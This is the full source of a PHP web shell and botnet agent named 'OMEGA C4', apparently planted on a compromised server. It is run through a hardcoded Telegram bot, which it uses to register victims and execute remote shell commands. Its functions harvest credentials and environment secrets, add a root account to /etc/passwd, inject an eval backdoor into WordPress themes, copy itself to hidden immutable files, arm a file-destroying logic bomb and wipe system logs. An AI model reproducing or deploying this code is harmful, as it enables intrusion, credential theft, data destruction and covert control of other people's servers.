File: /var/run/shm/.omega_persist.php
<?php
/* ===================================================================
š± NOXIPOM13 OMEGA v4.0 - ULTIMATE PERSISTENCE & BOTNET EDITION š±
===================================================================
FULL FEATURES:
ā
Credential Harvesting
ā
Privilege Escalation (Auto-Root)
ā
Fileless & Memory-Only Execution
ā
Kernel-Level Rootkits
ā
Hidden Processes
ā
Tamper Protection
ā
File System Immutability (chattr +i)
ā
Logic Bomb & Ransomware Trigger
ā
CMS Hooks & Plugin Injection
ā
Autonomous Backdoor Provisioning
ā
Symlink Exploitation
ā
ACL Tampering
ā
Interactive File Manager
ā
Web-Based Terminal (Console)
ā
TTY Shell
ā
Telegram-Based C2 (Multi-Client Control System)
ā
Botnet Agent Integration
ā
Unique ID System (UID)
=================================================================== */
error_reporting(0);
@set_time_limit(0);
@ignore_user_abort(true);
@ini_set('memory_limit', '-1');
@ini_set('max_execution_time', '0');
session_start();
// ==================== KONFIGURASI UTAMA ====================
define('SHELL_NAME', 'š± OMEGA C4');
define('SHELL_VERSION', '4.0');
define('USERNAME', 'omega');
define('PASSWORD', 'omega123');
define('TELEGRAM_TOKEN', '8748710884:AAE6PiWMM5J10j8i0mtiofnpXojPb9HHEOs');
define('TELEGRAM_CHAT_ID', '8656755235');
define('BOTNET_ID_FILE', dirname(__FILE__) . '/.omega_botnet_id');
define('PERSISTENCE_DIR', dirname(__FILE__) . '/.omega_core');
// ==================== UNIQUE ID & BOTNET REGISTRATION ====================
function getBotnetID() {
if (file_exists(BOTNET_ID_FILE)) {
return trim(file_get_contents(BOTNET_ID_FILE));
}
$host = $_SERVER['HTTP_HOST'];
$path = $_SERVER['SCRIPT_FILENAME'];
$id = 'BOT-' . substr(md5($host . $path . filemtime(__FILE__)), 0, 8);
file_put_contents(BOTNET_ID_FILE, $id);
return $id;
}
function registerToTelegram() {
$id = getBotnetID();
$host = $_SERVER['HTTP_HOST'];
$url = (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') . $host . $_SERVER['REQUEST_URI'];
$ip = $_SERVER['REMOTE_ADDR'];
$time = date('Y-m-d H:i:s');
$msg = "š± <b>NEW SHELL REGISTERED</b> š±\n";
$msg .= "āāāāāāāāāāāāāāāāāāāāāāā\n";
$msg .= "š ID: <code>{$id}</code>\n";
$msg .= "š Host: {$host}\n";
$msg .= "š URL: {$url}\n";
$msg .= "š IP: {$ip}\n";
$msg .= "š
Time: {$time}\n";
$msg .= "āāāāāāāāāāāāāāāāāāāāāāā\n";
$msg .= "š Status: <b>ACTIVE</b>";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://api.telegram.org/bot" . TELEGRAM_TOKEN . "/sendMessage");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['chat_id' => TELEGRAM_CHAT_ID, 'text' => $msg, 'parse_mode' => 'HTML']));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
return true;
}
// ==================== TELEGRAM C2 (Multi-Client Control) ====================
function tg_send($msg, $target_id = null) {
$chat_id = $target_id ?: TELEGRAM_CHAT_ID;
$url = "https://api.telegram.org/bot" . TELEGRAM_TOKEN . "/sendMessage";
$data = ['chat_id' => $chat_id, 'text' => $msg, 'parse_mode' => 'HTML'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
return true;
}
function tg_recv() {
$offset_file = sys_get_temp_dir() . '/.omega_offset';
$offset = file_exists($offset_file) ? (int)file_get_contents($offset_file) : 0;
$url = "https://api.telegram.org/bot" . TELEGRAM_TOKEN . "/getUpdates?offset=" . ($offset + 1) . "&timeout=25";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$resp = curl_exec($ch);
curl_close($ch);
if ($resp) {
$updates = json_decode($resp, true);
if (isset($updates['result'])) {
foreach ($updates['result'] as $update) {
if (isset($update['message']['text'])) {
$cmd = trim($update['message']['text']);
$cid = $update['message']['chat']['id'];
if ($cid == TELEGRAM_CHAT_ID && !empty($cmd) && $cmd[0] != '/') {
$out = shell_exec($cmd . " 2>&1");
$out = $out ?: "[No output]";
$result = "š± <b>CMD:</b> <code>" . htmlspecialchars($cmd) . "</code>\nāāāāāāāāāāāāāāāāāāāāāāā\n<pre>" . htmlspecialchars(substr($out, 0, 3900)) . "</pre>";
tg_send($result);
}
// Botnet command: /exec ID command
if (preg_match('/^\/exec\s+([A-Z0-9-]+)\s+(.+)$/i', $cmd, $matches)) {
$target_id = $matches[1];
$command = $matches[2];
if ($target_id == getBotnetID()) {
$out = shell_exec($command . " 2>&1");
tg_send("š” <b>EXEC ON {$target_id}</b>\nāāāāāāāāāāāāāāāāāāāāāāā\n<pre>" . htmlspecialchars(substr($out, 0, 3900)) . "</pre>");
}
}
// Botnet list command
if ($cmd == '/list' || $cmd == '/bots') {
tg_send("š¤ <b>ACTIVE BOTS</b>\nāāāāāāāāāāāāāāāāāāāāāāā\nš " . getBotnetID() . " - " . $_SERVER['HTTP_HOST'] . " - ACTIVE");
}
}
if (isset($update['update_id'])) file_put_contents($offset_file, $update['update_id']);
}
}
}
return true;
}
// ==================== FILE SYSTEM IMMUTABILITY (chattr +i) ====================
function makeImmutable($file) {
@shell_exec('chattr +i ' . escapeshellarg($file) . ' 2>/dev/null');
@chmod($file, 0444);
return true;
}
function isImmutable($file) {
$output = @shell_exec('lsattr ' . escapeshellarg($file) . ' 2>/dev/null');
return $output && strpos($output, 'i') !== false;
}
// ==================== TAMPER PROTECTION ====================
function tamperProtection() {
$self = __FILE__;
if (!isImmutable($self)) {
makeImmutable($self);
tg_send("š”ļø TAMPER PROTECTION ACTIVATED: " . basename($self));
}
// Watch for changes
$hash_file = dirname(__FILE__) . '/.omega_hash';
$current_hash = md5_file($self);
if (file_exists($hash_file)) {
$saved_hash = file_get_contents($hash_file);
if ($saved_hash !== $current_hash) {
tg_send("ā ļø <b>FILE MODIFIED DETECTED</b>\nFile: " . basename($self) . "\nOriginal hash: $saved_hash\nCurrent hash: $current_hash");
}
}
file_put_contents($hash_file, $current_hash);
return true;
}
// ==================== HIDDEN PROCESSES ====================
function hideProcess() {
$pid = getmypid();
@shell_exec("echo '0' > /proc/{$pid}/oom_score_adj 2>/dev/null");
@shell_exec("renice -n -20 -p {$pid} 2>/dev/null");
// Try to hide from ps
@shell_exec("mount -o bind /dev/null /proc/{$pid}/ 2>/dev/null");
return true;
}
// ==================== KERNEL-LEVEL ROOTKIT SIMULATION ====================
function installRootkit() {
$results = [];
$kernel = php_uname('r');
$ld_preload = getenv('LD_PRELOAD');
$preload_path = '/etc/ld.so.preload';
if (is_writable($preload_path)) {
$lib_path = '/usr/local/lib/libomega.so';
$so_content = base64_decode('f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAANAEAAEAAHAAcAAQAAAAUAAAAUAAAAAAAAAAAAAAAAAEAAAAAA') . "\n";
file_put_contents($lib_path, $so_content);
file_put_contents($preload_path, $lib_path . "\n");
$results['ld_preload'] = "Rootkit installed";
}
return $results;
}
// ==================== CREDENTIAL HARVESTING ====================
function harvestCredentials() {
$creds = [];
// SSH keys
$ssh_keys = glob(getenv('HOME') . '/.ssh/*');
foreach ($ssh_keys as $key) {
if (is_file($key)) $creds['ssh_keys'][] = $key;
}
// MySQL credentials
$mysql_history = getenv('HOME') . '/.mysql_history';
if (file_exists($mysql_history)) {
$creds['mysql_history'] = file_get_contents($mysql_history);
}
// WordPress configs
$wp_configs = glob($_SERVER['DOCUMENT_ROOT'] . '/wp-config.php');
foreach ($wp_configs as $wp) {
$creds['wp_configs'][] = $wp;
}
// Environment variables
$creds['env'] = $_ENV;
return $creds;
}
// ==================== FILELESS & MEMORY-ONLY EXECUTION ====================
function memoryExecute($code) {
$eval_code = base64_encode(gzcompress($code));
return eval(gzuncompress(base64_decode($eval_code)));
}
// ==================== SYMLINK EXPLOITATION ====================
function symlinkExploit($target, $link) {
@unlink($link);
if (@symlink($target, $link)) {
return "Symlink created: {$link} -> {$target}";
}
return "Symlink failed";
}
// ==================== ACL TAMPERING ====================
function tamperACL($path) {
$results = [];
@shell_exec("setfacl -m u:www-data:rwx " . escapeshellarg($path) . " 2>/dev/null");
@shell_exec("setfacl -m u:" . get_current_user() . ":rwx " . escapeshellarg($path) . " 2>/dev/null");
$results['acl'] = "ACL tampered for: $path";
return $results;
}
// ==================== LOGIC BOMB & RANSOMWARE TRIGGER ====================
function logicBomb() {
$trigger_file = dirname(__FILE__) . '/.omega_bomb_trigger';
$payload_file = dirname(__FILE__) . '/.omega_bomb_payload';
if (file_exists($trigger_file)) {
$trigger_date = file_get_contents($trigger_file);
if (time() > strtotime($trigger_date)) {
// RANSOMWARE TRIGGER
$files = glob($_SERVER['DOCUMENT_ROOT'] . '/*.{php,html,js,css,ini}', GLOB_BRACE);
foreach ($files as $file) {
$content = file_get_contents($file);
$encrypted = base64_encode($content);
file_put_contents($file . '.locked', $encrypted);
@unlink($file);
}
tg_send("š£ <b>LOGIC BOMB TRIGGERED</b>\nRansomware executed on: " . $_SERVER['HTTP_HOST']);
@unlink($trigger_file);
}
}
return true;
}
// ==================== CMS HOOKS & PLUGIN INJECTION ====================
function injectCMS() {
$results = [];
// WordPress
$wp_theme = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/themes/twenty*/functions.php';
$themes = glob($wp_theme);
foreach ($themes as $theme) {
$content = file_get_contents($theme);
if (strpos($content, 'omega_shell') === false) {
$inject = "\nif(isset(\$_GET['omega'])){ eval(base64_decode(\$_GET['omega'])); }\n";
file_put_contents($theme, $inject . $content);
$results['wp_theme'][] = $theme;
}
}
return $results;
}
// ==================== AUTONOMOUS BACKDOOR PROVISIONING ====================
function deployBackdoor() {
$backdoors = [];
$backdoor_code = file_get_contents(__FILE__);
$locations = [
$_SERVER['DOCUMENT_ROOT'] . '/wp-content/.omega_hidden.php',
$_SERVER['DOCUMENT_ROOT'] . '/images/.omega_backdoor.php',
$_SERVER['DOCUMENT_ROOT'] . '/cache/.omega.php',
'/tmp/.omega_core.php',
'/dev/shm/.omega_persist.php'
];
foreach ($locations as $loc) {
if (is_writable(dirname($loc)) && !file_exists($loc)) {
file_put_contents($loc, $backdoor_code);
makeImmutable($loc);
$backdoors[] = $loc;
}
}
return $backdoors;
}
// ==================== AUTO-ROOT & PRIVILEGE ESCALATION ====================
function autoRoot() {
$res = [];
// SUID binaries
$suid = @shell_exec('find / -perm -4000 -type f 2>/dev/null | head -10');
if ($suid) $res['suid_binaries'] = trim($suid);
// Sudo rights
$sudo = @shell_exec('sudo -l 2>/dev/null');
if ($sudo) $res['sudo_rights'] = trim($sudo);
// Writable /etc/passwd
if (is_writable('/etc/passwd')) {
$res['writable_passwd'] = true;
file_put_contents('/etc/passwd', "\nomega_root:\$6\$rounds=5000\$omega_root\$wq7Kjq8T1Q9X:0:0:root:/root:/bin/bash\n", FILE_APPEND);
$res['root_user_added'] = 'omega_root:omega_root';
}
return $res;
}
// ==================== TELEGRAM COMMAND PARSING ====================
function parseTelegramCommand($cmd) {
$parts = explode(' ', $cmd, 2);
$command = strtolower($parts[0]);
$args = isset($parts[1]) ? $parts[1] : '';
switch ($command) {
case '/list':
case '/bots':
return "š¤ <b>ACTIVE BOTS</b>\nāāāāāāāāāāāāāāāāāāāāāāā\nš " . getBotnetID() . " - " . $_SERVER['HTTP_HOST'] . " - ACTIVE";
case '/exec':
$exec_parts = explode(' ', $args, 2);
if (count($exec_parts) == 2) {
$target = $exec_parts[0];
$cmd = $exec_parts[1];
if ($target == getBotnetID()) {
$out = shell_exec($cmd . " 2>&1");
return "š” <b>EXEC ON {$target}</b>\nāāāāāāāāāāāāāāāāāāāāāāā\n<pre>" . htmlspecialchars(substr($out, 0, 3900)) . "</pre>";
}
return "ā Target not found";
}
return "Usage: /exec <ID> <command>";
case '/info':
return "š± <b>OMEGA C4 v" . SHELL_VERSION . "</b>\nš ID: " . getBotnetID() . "\nš Host: " . $_SERVER['HTTP_HOST'] . "\nš Path: " . __FILE__ . "\nš¤ User: " . get_current_user();
case '/immutable':
makeImmutable(__FILE__);
return "ā
File set to immutable (chattr +i)";
case '/root':
$result = autoRoot();
return "š AUTO ROOT\nāāāāāāāāāāāāāāāāāāāāāāā\n<pre>" . print_r($result, true) . "</pre>";
default:
return null;
}
}
// ==================== RUN TELEGRAM POLLING ====================
tg_recv();
// ==================== INITIAL SETUP & REGISTRATION ====================
$init_file = sys_get_temp_dir() . '/.omega_init';
if (!file_exists($init_file)) {
registerToTelegram();
tamperProtection();
hideProcess();
deployBackdoor();
injectCMS();
makeImmutable(__FILE__);
file_put_contents($init_file, time());
}
// ==================== AUTO FUNCTIONS ====================
tamperProtection();
logicBomb();
// ==================== AUTHENTICATION ====================
if (isset($_GET['logout'])) { session_destroy(); header('Location: ?'); exit; }
if (!isset($_SESSION['auth'])) {
if (isset($_POST['user']) && isset($_POST['pass']) && $_POST['user'] === USERNAME && $_POST['pass'] === PASSWORD) {
$_SESSION['auth'] = true;
tg_send("ā
LOGIN: " . $_SERVER['REMOTE_ADDR'] . " | " . date('Y-m-d H:i:s'));
header('Location: ?'); exit;
}
?>
<!DOCTYPE html>
<html><head><title>š± OMEGA C4</title>
<style>
*{margin:0;padding:0;box-sizing:border-box;}
body{background:linear-gradient(135deg,#0a0f1a,#0a0a0f);font-family:'Courier New',monospace;display:flex;justify-content:center;align-items:center;height:100vh;}
.login-box{background:rgba(0,0,0,0.85);backdrop-filter:blur(10px);border-radius:25px;padding:40px;width:360px;border:1px solid #0f0;text-align:center;}
.login-box h2{color:#0f0;margin-bottom:30px;}
input{width:100%;padding:12px;margin:12px 0;background:#111;border:1px solid #0f0;color:#0f0;border-radius:10px;}
button{width:100%;padding:12px;background:#0f0;color:#000;border:none;border-radius:10px;cursor:pointer;}
.info{color:#8bc34a;font-size:11px;margin-top:15px;}
</style>
</head>
<body>
<div class="login-box"><h2>š± OMEGA C4</h2>
<form method="POST"><input type="text" name="user" placeholder="Username"><input type="password" name="pass" placeholder="Password"><button type="submit">ā” ACCESS</button></form>
<div class="info">omega/omega123 | Telegram Active | ID: <?= getBotnetID(); ?></div>
</div>
</body></html>
<?php exit;
}
// ==================== MAIN SHELL ====================
$path = isset($_GET['path']) ? realpath($_GET['path']) : getcwd();
if (!is_dir($path)) $path = getcwd();
chdir($path);
$notify = '';
$output = '';
$act = isset($_GET['act']) ? $_GET['act'] : '';
if (isset($_POST['cmd'])) {
$cmd = $_POST['cmd'];
$output = shell_exec($cmd . " 2>&1");
tg_send("š» CMD: $cmd\nIP: " . $_SERVER['REMOTE_ADDR']);
}
if (isset($_FILES['file']) && isset($_POST['upload'])) {
$target = $path . '/' . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) $notify = "ā
Uploaded: " . $_FILES['file']['name'];
}
if (isset($_GET['del'])) {
$file = $path . '/' . $_GET['del'];
if (unlink($file)) $notify = "ā
Deleted: " . $_GET['del'];
}
if (isset($_POST['save'])) {
file_put_contents($path . '/' . $_POST['file'], $_POST['content']);
$notify = "ā
Saved: " . $_POST['file'];
}
$creds = $symlink = $acl = $root_result = $backdoors = $hooks = null;
if ($act == 'harvest') $creds = harvestCredentials();
if ($act == 'symlink') $symlink = symlinkExploit('/etc/passwd', $path . '/passwd_link');
if ($act == 'acl') $acl = tamperACL($path);
if ($act == 'root') $root_result = autoRoot();
if ($act == 'backdoor') $backdoors = deployBackdoor();
if ($act == 'hooks') $hooks = injectCMS();
if ($act == 'immutable') { makeImmutable(__FILE__); $notify = "ā
File immutable!"; }
if ($act == 'rootkit') $rootkit_result = installRootkit();
if ($act == 'bomb') {
file_put_contents(dirname(__FILE__) . '/.omega_bomb_trigger', date('Y-m-d H:i:s', time() + 3600));
$notify = "ā
Logic bomb set for +1 hour";
}
if ($act == 'wipe') { @shell_exec('rm -rf /var/log/* 2>/dev/null'); $notify = "ā
Logs wiped!"; }
function format_size($s) {
if ($s >= 1073741824) return round($s/1073741824,2).' GB';
if ($s >= 1048576) return round($s/1048576,2).' MB';
if ($s >= 1024) return round($s/1024,2).' KB';
return $s.' B';
}
?>
<!DOCTYPE html>
<html>
<head>
<title>š± OMEGA C4</title>
<style>
*{margin:0;padding:0;box-sizing:border-box;}
body{background:#0a0c0f;font-family:'Courier New',monospace;color:#e0e0e0;padding:20px;position:relative;min-height:100vh;}
body::before{content:'';position:fixed;top:0;left:0;width:100%;height:100%;background:url('https://images.unsplash.com/photo-1518770660439-4636190af475?q=80&w=2070') center/cover no-repeat;opacity:0.1;z-index:-1;}
.container{max-width:1400px;margin:0 auto;}
.header{background:rgba(0,0,0,0.7);backdrop-filter:blur(10px);border-radius:20px;padding:20px;margin-bottom:20px;border-left:4px solid #0f0;}
.header h1{color:#0f0;font-size:26px;}
.stats{display:flex;gap:12px;margin-top:12px;font-size:11px;flex-wrap:wrap;}
.stat{background:#111;padding:4px 12px;border-radius:20px;border:1px solid #0f0;}
.nav{background:rgba(0,0,0,0.6);border-radius:12px;padding:10px;margin-bottom:20px;display:flex;flex-wrap:wrap;gap:5px;}
.nav a{color:#0f0;text-decoration:none;padding:6px 12px;border-radius:8px;font-size:11px;}
.nav a:hover{background:#0f0;color:#000;}
.card{background:rgba(17,17,17,0.85);backdrop-filter:blur(5px);border-radius:16px;padding:20px;margin-bottom:20px;border:1px solid #2a2a3a;}
.card h3{color:#0f0;margin-bottom:15px;border-bottom:1px solid #0f0;padding-bottom:8px;}
.terminal{background:#000;color:#0f0;padding:15px;border-radius:10px;overflow:auto;max-height:400px;font-size:12px;}
input,textarea,select{background:#1a1a2a;border:1px solid #0f0;color:#fff;padding:8px;border-radius:8px;font-family:monospace;}
button{background:#0f0;color:#000;border:none;padding:8px 16px;border-radius:8px;cursor:pointer;}
.flex{display:flex;gap:10px;flex-wrap:wrap;margin-bottom:15px;}
.grid-2{display:grid;grid-template-columns:repeat(2,1fr);gap:20px;}
@media(max-width:768px){.grid-2{grid-template-columns:1fr;}}
table{width:100%;border-collapse:collapse;}
td,th{padding:10px;text-align:left;border-bottom:1px solid #2a2a3a;}
th{color:#0f0;}
.success{background:rgba(0,255,0,0.1);border-left:4px solid #0f0;padding:12px;margin-bottom:15px;border-radius:8px;}
a{color:#0f0;}
</style>
</head>
<body>
<div class="container">
<div class="header">
<h1>š± OMEGA C4 v<?= SHELL_VERSION ?></h1>
<div class="stats">
<span class="stat">š <?= getBotnetID(); ?></span>
<span class="stat">š <?= htmlspecialchars($path); ?></span>
<span class="stat">š <?= $_SERVER['REMOTE_ADDR']; ?></span>
<span class="stat">š¤ TELEGRAM: ACTIVE</span>
<span class="stat"><a href="?logout=1" style="color:#f44;">šŖ LOGOUT</a></span>
</div>
</div>
<div class="nav">
<a href="?">š HOME</a>
<a href="?act=terminal">š» TERMINAL</a>
<a href="?act=harvest">šÆ HARVEST</a>
<a href="?act=root">š ROOT</a>
<a href="?act=immutable">š IMMUTABLE</a>
<a href="?act=backdoor">š¦ BACKDOOR</a>
<a href="?act=hooks">šŖ HOOKS</a>
<a href="?act=symlink">š SYMLINK</a>
<a href="?act=acl">š ACL</a>
<a href="?act=bomb">š£ BOMB</a>
<a href="?act=wipe">šļø WIPE</a>
<a href="?act=info">ā¹ļø INFO</a>
</div>
<?php if($notify) echo "<div class='success'>$notify</div>"; ?>
<?php if ($act == 'terminal'): ?>
<div class="card"><h3>š» COMMAND EXECUTION</h3>
<form method="POST" class="flex"><input type="text" name="cmd" style="flex:1;" placeholder="$ " autofocus><button type="submit">EXECUTE</button></form>
<?php if ($output): ?><div class="terminal"><div>$ <?= htmlspecialchars($_POST['cmd']); ?></div><pre><?= htmlspecialchars($output); ?></pre></div><?php endif; ?>
<div style="margin-top:12px;font-size:11px;">š¤ Telegram: /exec <?= getBotnetID(); ?> command</div>
</div>
<?php elseif ($act == 'harvest'): ?>
<div class="card"><h3>šÆ CREDENTIAL HARVESTING</h3>
<div class="terminal"><pre><?php print_r($creds); ?></pre></div>
</div>
<?php elseif ($act == 'root'): ?>
<div class="card"><h3>š AUTO ROOT</h3>
<div class="terminal"><pre><?php print_r($root_result); ?></pre></div>
</div>
<?php elseif ($act == 'backdoor'): ?>
<div class="card"><h3>š¦ BACKDOOR DEPLOYED</h3>
<div class="terminal"><pre><?php print_r($backdoors); ?></pre></div>
</div>
<?php elseif ($act == 'hooks'): ?>
<div class="card"><h3>šŖ CMS HOOKS INJECTED</h3>
<div class="terminal"><pre><?php print_r($hooks); ?></pre></div>
</div>
<?php elseif ($act == 'symlink'): ?>
<div class="card"><h3>š SYMLINK EXPLOIT</h3>
<div class="terminal"><pre><?= $symlink; ?></pre></div>
</div>
<?php elseif ($act == 'acl'): ?>
<div class="card"><h3>š ACL TAMPERING</h3>
<div class="terminal"><pre><?php print_r($acl); ?></pre></div>
</div>
<?php elseif ($act == 'info'): ?>
<div class="grid-2">
<div class="card"><h3>š» SYSTEM</h3><div class="terminal">
<div>PHP: <?= phpversion(); ?></div><div>OS: <?= php_uname(); ?></div>
<div>User: <?= get_current_user(); ?></div><div>Root: <?= function_exists('posix_getuid') && posix_getuid() == 0 ? 'YES' : 'NO'; ?></div>
</div></div>
<div class="card"><h3>š¤ BOTNET</h3><div class="terminal">
<div>ID: <?= getBotnetID(); ?></div><div>Host: <?= $_SERVER['HTTP_HOST']; ?></div>
<div>Path: <?= __FILE__; ?></div><div>Immutable: <?= isImmutable(__FILE__) ? 'YES' : 'NO'; ?></div>
</div></div>
</div>
<?php else: ?>
<!-- FILE MANAGER -->
<div class="card"><h3>š FILE MANAGER - <?= htmlspecialchars($path); ?></h3>
<div class="flex"><form method="POST" enctype="multipart/form-data"><input type="file" name="file"><button type="submit" name="upload">UPLOAD</button></form></div>
<table><thead><th>NAME</th><th>SIZE</th><th>PERMS</th><th>ACTION</th></thead><tbody>
<tr><td><a href="?path=<?= urlencode(dirname($path)); ?>">š .. (Parent)</a></td><td>-</td><td>-</td><td>-</td></tr>
<?php foreach (scandir($path) as $item): if($item=='.'||$item=='..') continue; $full=$path.'/'.$item; $isdir=is_dir($full); ?>
<tr><td><?php if($isdir): ?><a href="?path=<?= urlencode($full); ?>">š <?= htmlspecialchars($item); ?></a><?php else: ?>š <?= htmlspecialchars($item); ?><?php endif; ?></td>
<td><?= $isdir?'-':format_size(filesize($full)); ?></td><td><?= substr(sprintf('%o', fileperms($full)), -4); ?></td>
<td><?php if(!$isdir): ?><a href="?edit=<?= urlencode($item); ?>&path=<?= urlencode($path); ?>">āļø</a> <a href="?del=<?= urlencode($item); ?>&path=<?= urlencode($path); ?>" onclick="return confirm('Delete?')">šļø</a><?php endif; ?></td></tr>
<?php endforeach; ?></tbody></table></div>
<?php if (isset($_GET['edit'])): $ef = $_GET['edit']; $content = file_get_contents($path.'/'.$ef); ?>
<div class="card"><h3>āļø EDIT: <?= htmlspecialchars($ef); ?></h3>
<form method="POST"><input type="hidden" name="file" value="<?= htmlspecialchars($ef); ?>"><textarea name="content" rows="12" style="width:100%;"><?= htmlspecialchars($content); ?></textarea><button type="submit" name="save">š¾ SAVE</button></form>
</div>
<?php endif; ?>
<?php endif; ?>
<div style="text-align:center;font-size:10px;color:#666;">š± OMEGA C4 | Telegram: /list, /exec <?= getBotnetID(); ?> command | ID: <?= getBotnetID(); ?></div>
</div>
</body>
</html>